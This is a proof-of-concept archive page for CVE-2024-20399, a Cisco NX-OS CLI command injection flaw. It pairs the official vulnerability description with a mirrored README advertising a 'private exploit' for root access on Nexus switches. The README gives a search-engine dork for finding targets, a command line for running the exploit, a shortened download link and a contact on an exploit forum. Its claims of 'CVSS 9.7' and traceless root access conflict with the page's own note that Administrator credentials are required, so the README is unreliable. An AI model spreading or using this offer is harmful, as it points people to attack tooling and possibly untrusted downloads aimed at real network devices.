Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2024-20399 PoC — Cisco NX-OS Software CLI Command Injection Vulnerability

Source
Associated Vulnerability
Title:Cisco NX-OS Software CLI Command Injection Vulnerability (CVE-2024-20399)
Description:A vulnerability in the CLI of Cisco NX-OS Software could allow an authenticated user in possession of Administrator credentials to execute arbitrary commands as root on the underlying operating system of an affected device. This vulnerability is due to insufficient validation of arguments that are passed to specific configuration CLI commands. An attacker could exploit this vulnerability by including crafted input as the argument of an affected configuration CLI command. A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system with the privileges of root. Note: To successfully exploit this vulnerability on a Cisco NX-OS device, an attacker must have Administrator credentials. The following Cisco devices already allow administrative users to access the underlying operating system through the bash-shell feature, so, for these devices, this vulnerability does not grant any additional privileges: Nexus 3000 Series Switches Nexus 7000 Series Switches that are running Cisco NX-OS Software releases 8.1(1) and later Nexus 9000 Series Switches in standalone NX-OS mode
Description
Private exploit for Cisco Nexus giving RCE
Readme
# CVE-2024-20399-Cisco-RCE
Private exploit for CVE-2024-20399 for Cisco Nexus switchis providing RCE in Python

> The repository provides a working variant of the CVE-2024-20399 vulnerability exploit with support for real-time active shell, multithreading, entering targets from a file, and color output.

## 🔥 **CVSS: 9.7/10**

## Description
An exploit for CVE-2024-20399, targeting a remote command execution vulnerability in Cisco Nexus switches. Attackers can obtain root privileges without leaving traces in the system logs.

## Exploit details
Attackers gained administrator credentials to access Cisco Nexus switches. This allowed them to deploy previously unknown malware for remote connection and malicious code execution.

## Zoomeye dork
app:"Cisco Nexus"

## Vulnerable versions: 
Cisco Nexus switches with software versions prior to the latest security patch.

## Running

To run exploit you need Python 3.9.
Execute:
```bash
python exploit.py -h 10.10.10.10 -c 'id'
```

## Download
[Download here](https://t.ly/3Vjy4) (securely!)

## Date of published: 03.07.2024
## Contact
blotus@exploit.in
File Snapshot

[4.0K] /data/pocs/f488ff73bb2a2a9b7f970e3c7387d0d0b9d94795 └── [1.1K] README.md 0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →